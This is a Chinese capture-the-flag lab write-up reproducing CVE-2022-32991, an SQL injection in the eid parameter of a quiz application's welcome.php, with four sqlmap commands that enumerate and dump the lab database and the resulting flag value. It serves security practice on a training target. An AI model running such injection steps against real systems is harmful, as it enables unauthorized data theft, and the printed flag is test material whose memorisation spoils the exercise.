春秋云境:CVE-2022-32991[漏洞复现]

从CVE官网查询该漏洞相关信息

该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞

则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数


开启靶机

先在页面正常注册、登录一个账号。密码随便填

进入了home目录,这里有三个话题可以选择开启

随便选择一个进行开启点击Start即可

进入后查看网页URL

可以看到这里的URL地址就出现了welcome.php和eid参数


使用自动化工具SQLMAP漏洞利用

爆库:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch --dbs

拿到了四个数据库,继续选择ctf库进行爆表


爆表:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf --tables

再继续爆列:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag --columns

最后查看flag里面的内容: sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag -C flag --dump


flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}

相关推荐
Neolnfra16 小时前
渗透测试标准化流程
开发语言·安全·web安全·http·网络安全·https·系统安全
.昕..16 小时前
2025CTF逆向工程“新范式”:当Jadx装上AI大脑,逆向效率提升
网络安全
云计算练习生17 小时前
渗透测试行业术语扫盲(第十六篇)—— 红蓝对抗与演练类
网络·安全·网络安全·信息安全·渗透测试术语
小阿宁的猫猫18 小时前
sqlmap的使用
sql·网络安全·php
百度安全19 小时前
百度办公网安全秘诀分享——兼顾安全与效率
安全·网络安全·dubbo·办公安全
白帽子黑客罗哥21 小时前
零基础使用网络安全工具的方法
安全·web安全·网络安全·渗透测试·漏洞挖掘·工具
Whoami!1 天前
❾⁄₁ ⟦ OSCP ⬖ 研记 ⟧ 防病毒软件规避 ➱ 防病毒软件概述(上)
网络安全·信息安全·防病毒
Bug.ink1 天前
BUUCTF——WEB(1)
网络安全·靶场·buuctf
白帽子黑客杰哥1 天前
推荐一些适合零基础学习网络安全的具体在线课程或书籍?
学习·安全·web安全·网络安全·渗透测试
eve杭1 天前
AI、大数据与智能时代:从理论基石到实战路径
人工智能·python·5g·网络安全·ai